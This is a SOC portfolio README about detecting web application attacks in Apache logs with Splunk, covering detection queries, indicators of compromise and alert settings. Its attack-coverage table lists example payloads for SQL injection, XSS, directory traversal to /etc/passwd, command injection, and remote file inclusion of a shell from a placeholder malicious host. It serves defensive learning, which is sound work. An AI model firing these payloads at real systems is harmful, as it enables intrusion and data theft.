Share
## https://sploitus.com/exploit?id=14977086-DBF7-5E28-AF87-DC659317A328
# ๐Ÿ” Web Application Attack Detection & Threat Hunting Using Splunk

![Splunk](https://img.shields.io/badge/Splunk-Enterprise_10.2.3-black?style=flat-square&logo=splunk&logoColor=green)
![Platform](https://img.shields.io/badge/Platform-Windows-0078D4?style=flat-square&logo=windows)
![Role](https://img.shields.io/badge/Role-SOC_Analyst-red?style=flat-square)
![Events Analyzed](https://img.shields.io/badge/Events_Analyzed-248%2C664-brightgreen?style=flat-square)
![Status](https://img.shields.io/badge/Status-Complete-success?style=flat-square)

> A full SOC analyst workflow โ€” log ingestion, SIEM troubleshooting, threat hunting, detection engineering, alert creation, and IOC identification โ€” built end-to-end in Splunk Enterprise.

---

## ๐Ÿ“‹ Table of Contents

- [Project Overview](#project-overview)
- [Environment](#environment)
- [Attack Coverage](#attack-coverage)
- [Key Findings](#key-findings)
- [Detection Logic](#detection-logic)
- [Indicators of Compromise](#indicators-of-compromise)
- [Alert Configuration](#alert-configuration)
- [Repository Structure](#repository-structure)
- [Skills Demonstrated](#skills-demonstrated)

---

## Project Overview

This project simulates a real-world Security Operations Center (SOC) engagement using Splunk Enterprise to ingest, parse, and analyze malicious web application traffic from an Apache-style access log.

**Key outcomes:**
- Processed **248,664 events** across a full web attack dataset
- Identified **24 unique IP / attack-type combinations** via detection query
- Flagged a **potentially successful RCE attempt** (HTTP 200 response to command injection)
- Built and scheduled a **Critical Web Attack Detection** alert running every 1 minute

---

## Environment

| Component       | Details                              |
|-----------------|--------------------------------------|
| SIEM Platform   | Splunk Enterprise 10.2.3             |
| Operating System | Windows                             |
| Data Source     | `access_log.txt`                     |
| Sourcetype      | `access_combined`                    |
| Index           | `main`                               |
| Log Type        | Web Server Access Logs (Apache CLF)  |

---

## Attack Coverage

| Attack Type                      | Example Payload                                    | Risk Level  |
|----------------------------------|----------------------------------------------------|-------------|
| SQL Injection (SQLi)             | `/search?query=' OR '1'='1`                        | ๐Ÿ”ด Critical |
| Cross-Site Scripting (XSS)       | `/profile.php?name=alert('XSS')` | ๐ŸŸ  High     |
| Directory Traversal / LFI        | `/download?file=../../../../etc/passwd`            | ๐Ÿ”ด Critical |
| Command Injection / RCE          | `/exec.php?cmd=whoami;id;ls -la`                   | ๐Ÿ”ด Critical |
| Remote File Inclusion (RFI)      | `/page.php?url=http://malicious.com/shell.txt`     | ๐Ÿ”ด Critical |
| Reconnaissance / Automated Scan  | Nmap Scripting Engine, sqlmap                      | ๐ŸŸก Medium   |

---

## Key Findings

### โš ๏ธ Critical โ€” Potential Successful Exploitation
```
GET /exec.php?cmd=whoami;id;ls -la HTTP/1.1" 200
```
HTTP 200 returned for a command injection payload โ€” indicates the target application may have **accepted and executed** remote commands. This warrants immediate escalation and forensic investigation.

### Attacker Behavior Pattern
- External IPs performed automated scanning followed by targeted injection
- Internal IP `10.0.0.5` exhibited suspicious command injection activity (insider threat or lateral movement)
- `sqlmap` and `Nmap` user-agents confirm tooling-assisted exploitation attempts

---

## Detection Logic

The core SPL query is in [`queries/web_attack_detection.spl`](queries/web_attack_detection.spl).

**Logic overview:**
1. Filter events from the web log source containing attack signatures
2. Extract source IP via `rex` field extraction
3. Classify each event into an attack category via `eval/case`
4. Aggregate by `src_ip` and `attack_type` for triage

**Index validation query** (used during SIEM troubleshooting):
```spl
index=* | stats count by index sourcetype source host
```

---

## Indicators of Compromise

### Suspicious IP Addresses

| IP Address        | Activity                         |
|-------------------|----------------------------------|
| `185.199.110.153` | Command Injection / RFI / LFI   |
| `37.49.226.150`   | SQL Injection / Recon            |
| `192.168.1.101`   | SQLi / XSS / LFI                 |
| `10.0.0.5`        | Internal โ€” Command Injection     |

### Suspicious User Agents
- `sqlmap/1.4.5-dev`
- `Nmap Scripting Engine`

Full IOC reference โ†’ [`iocs/indicators.md`](iocs/indicators.md)

---

## Alert Configuration

| Parameter       | Value                              |
|-----------------|------------------------------------|
| Alert Name      | Critical Web Application Attack Detection |
| Alert Type      | Scheduled                          |
| Schedule        | Every 1 minute                     |
| Search Window   | Last 5 minutes                     |
| Trigger         | Number of Results > 0              |
| Severity        | High / Critical                    |

---

## Repository Structure

```
splunk-web-attack-detection/
โ”œโ”€โ”€ README.md                    # This file
โ”œโ”€โ”€ queries/
โ”‚   โ”œโ”€โ”€ web_attack_detection.spl # Primary detection query
โ”‚   โ””โ”€โ”€ validation_query.spl     # Index/sourcetype validation
โ”œโ”€โ”€ docs/
โ”‚   โ””โ”€โ”€ SOC_Report.md            # Full SOC analyst report
โ”œโ”€โ”€ iocs/
โ”‚   โ””โ”€โ”€ indicators.md            # IP addresses, user agents, payloads
โ””โ”€โ”€ screenshots/                 # Evidence: query results, alert config
    โ”œโ”€โ”€ detection_query_results.png
    โ”œโ”€โ”€ statistics_view.png
    โ”œโ”€โ”€ alert_creation.png
    โ””โ”€โ”€ triggered_alerts.png
```

---

## Skills Demonstrated

| Domain                    | Specifics                                          |
|---------------------------|----------------------------------------------------|
| SIEM Operations           | Splunk log ingestion, index validation, troubleshooting |
| Detection Engineering     | SPL query development, regex extraction, eval logic |
| Threat Hunting            | Pattern analysis, behavioral clustering            |
| IOC Analysis              | IP attribution, user-agent fingerprinting          |
| Alert Development         | Scheduled alerts, trigger thresholds               |
| Incident Response         | RCE triage, escalation criteria, HTTP status analysis |
| Web Attack Analysis       | SQLi, XSS, LFI, RFI, RCE, Recon                   |

---

## Related Projects

- [GRC & Risk Assessment Portfolio](https://github.com/) *(link your other repos)*
- [AWS Cloud Security โ€” NIST CSF Implementation](https://github.com/)

---

*Prepared by **Dunsin Fakorede** | SOC Analyst / Cybersecurity Learner*